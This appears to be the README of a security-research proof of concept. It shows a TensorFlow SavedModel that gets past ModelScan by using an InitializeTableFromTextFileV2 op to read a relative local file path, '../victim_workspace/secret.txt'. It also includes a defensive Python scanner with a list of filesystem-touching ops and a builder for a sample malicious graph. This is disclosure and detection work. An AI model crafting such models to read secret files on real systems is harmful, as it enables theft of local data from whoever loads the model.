---
library_name: tensorflow
tags:
- security-research
- tensorflow
- savedmodel
- modelscan
---

# TensorFlow SavedModel TextFileInitializer ModelScan Bypass PoC

This is a harmless proof-of-concept TensorFlow SavedModel for an authorized Huntr report.

The model contains an `InitializeTableFromTextFileV2` op whose filename input is a model-controlled relative path:

```text
../victim_workspace/secret.txt
```

ModelScan 0.8.8 reports zero issues for this `saved_model.pb`, while TensorFlow 2.21.0 loads the model and returns the first line of that local file through the `serving_default` signature. Because the path is relative, which file gets read depends on the working directory of the process that loads the model.
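
As an added check that is not part of this PoC repository or of ModelScan: the script below walks a `saved_model.pb` with a minimal protobuf wire-format reader, so it needs no TensorFlow import. It lists every node in the top-level `GraphDef` and in the function library (where TF2 stores traced `tf.function`s), flags ops that read or write the local filesystem, and resolves their `Const` string inputs so the path baked into the model is visible to the reviewer. The op set `FILE_OPS`, the node names and the `build_sample_saved_model` fixture are assumptions constructed for this example; the field numbers are those of TensorFlow's `.proto` definitions.

```python
# Added example: scan saved_model.pb for filesystem-touching ops without importing TF.

# Ops that read or write the local filesystem when the graph runs.
# Assumption: a starting list chosen for this example, not any scanner's official list.
FILE_OPS = {
    "ReadFile", "WriteFile", "MatchingFiles", "SaveV2", "RestoreV2",
    "InitializeTableFromTextFile", "InitializeTableFromTextFileV2",
    "TextLineDataset", "TFRecordDataset", "FixedLengthRecordDataset",
}

def _read_varint(buf, pos):
    result = shift = 0
    while True:
        b, pos = buf[pos], pos + 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7

def fields(buf):
    """Yield (field_number, wire_type, value) for each field of a serialized message."""
    pos = 0
    while pos < len(buf):
        key, pos = _read_varint(buf, pos)
        num, wt = key >> 3, key & 7
        if wt == 0:                                   # varint
            val, pos = _read_varint(buf, pos)
        elif wt == 2:                                 # length-delimited
            ln, pos = _read_varint(buf, pos)
            val, pos = buf[pos:pos + ln], pos + ln
        elif wt in (1, 5):                            # fixed64 / fixed32
            size = 8 if wt == 1 else 4
            val, pos = buf[pos:pos + size], pos + size
        else:
            raise ValueError(f"unsupported wire type {wt} at offset {pos}")
        yield num, wt, val

def sub(buf, num):
    """All length-delimited values of field `num` (nested messages, strings, bytes)."""
    return [v for n, wt, v in fields(buf) if n == num and wt == 2]

# Field numbers: tensorflow/core/protobuf/{saved_model,meta_graph}.proto and
# tensorflow/core/framework/{graph,function,node_def,attr_value,tensor}.proto.
def _nodes(saved_model):
    for mg in sub(saved_model, 2):                    # SavedModel.meta_graphs
        for gd in sub(mg, 2):                         # MetaGraphDef.graph_def
            yield from sub(gd, 1)                     # GraphDef.node
            for lib in sub(gd, 2):                    # GraphDef.library
                for fn in sub(lib, 1):                # FunctionDefLibrary.function
                    yield from sub(fn, 3)             # FunctionDef.node_def

def _parse_node(node):
    name = b"".join(sub(node, 1)).decode()
    op = b"".join(sub(node, 2)).decode()
    inputs = [v.decode() for v in sub(node, 3)]
    # NodeDef.attr is map<string, AttrValue>; each entry has key=1, value=2.
    attrs = {b"".join(sub(e, 1)).decode(): b"".join(sub(e, 2)) for e in sub(node, 5)}
    return name, op, inputs, attrs

def _const_strings(attrs):
    # AttrValue.tensor (8) -> TensorProto.string_val (8); empty for non-string consts.
    return [s.decode(errors="replace")
            for tensor in sub(attrs.get("value", b""), 8) for s in sub(tensor, 8)]

def scan_saved_model_bytes(data):
    """Return one (op, node_name, resolved_paths) finding per filesystem-touching op."""
    parsed = [_parse_node(n) for n in _nodes(data)]
    consts = {name: _const_strings(attrs) for name, op, _, attrs in parsed if op == "Const"}
    findings = []
    for name, op, inputs, _ in parsed:
        if op in FILE_OPS:
            # Inputs look like "node", "node:0", "node:out:0" or "^node" (control edge).
            producers = [i.lstrip("^").split(":")[0] for i in inputs]
            findings.append((op, name, [p for n in producers for p in consts.get(n, [])]))
    return findings

# --- constructed sample input (protobuf encoder), not a real PoC artefact ---------
def _varint(n):
    out = b""
    while n > 0x7F:
        out, n = out + bytes([n & 0x7F | 0x80]), n >> 7
    return out + bytes([n])

def _ld(num, payload):                                # length-delimited field
    return _varint(num << 3 | 2) + _varint(len(payload)) + payload

def _node(name, op, inputs=(), attrs=()):
    body = _ld(1, name.encode()) + _ld(2, op.encode())
    body += b"".join(_ld(3, i.encode()) for i in inputs)
    return body + b"".join(_ld(5, _ld(1, k.encode()) + _ld(2, v)) for k, v in attrs)

def build_sample_saved_model(filename="../victim_workspace/secret.txt"):
    """Stand-in for the PoC's saved_model.pb: table, Const filename and initializer in one function."""
    dt_string = _varint(7)                                          # types.proto DT_STRING
    tensor = _varint(1 << 3) + dt_string + _ld(2, b"") + _ld(8, filename.encode())
    const = _node("filename", "Const", attrs=[("dtype", _varint(6 << 3) + dt_string),
                                              ("value", _ld(8, tensor))])
    table = _node("hash_table", "HashTableV2")
    init = _node("init_table", "InitializeTableFromTextFileV2",
                 inputs=["hash_table:0", "filename:0"])
    function = b"".join(_ld(3, n) for n in (table, const, init))  # FunctionDef.node_def
    graph_def = _ld(2, _ld(1, function))                          # GraphDef.library.function
    return _ld(2, _ld(2, graph_def))                              # SavedModel.meta_graphs.graph_def

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_saved_model()
    for op, name, paths in scan_saved_model_bytes(data):
        print(f"{op:32} {name:20} {paths or '<non-constant filename>'}")
```

Run it as `python scan_saved_model.py path/to/saved_model.pb`; with no argument it scans the constructed sample and prints the `InitializeTableFromTextFileV2` node together with `../victim_workspace/secret.txt`. The op is reported even when the filename is not a constant (a `Placeholder` or a value computed in the graph), in which case the path column reads `<non-constant filename>`. Like any check keyed on op names, it only catches the ops in its list, which is exactly the kind of gap this PoC exercises, so the list is the part to keep under review.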

Run:

```bash
cd <repo-root>
python -m venv .venv
source .venv/bin/activate
python -m pip install -r requirements.txt
CUDA_VISIBLE_DEVICES=-1 python repro.py
```

Expected (the `visible_gpu_count` field confirms the CPU-only run forced by `CUDA_VISIBLE_DEVICES=-1`):

```json
{
  "modelscan_issue_count": 0,
  "leaked_expected_line": true,
  "visible_gpu_count": 0
}
```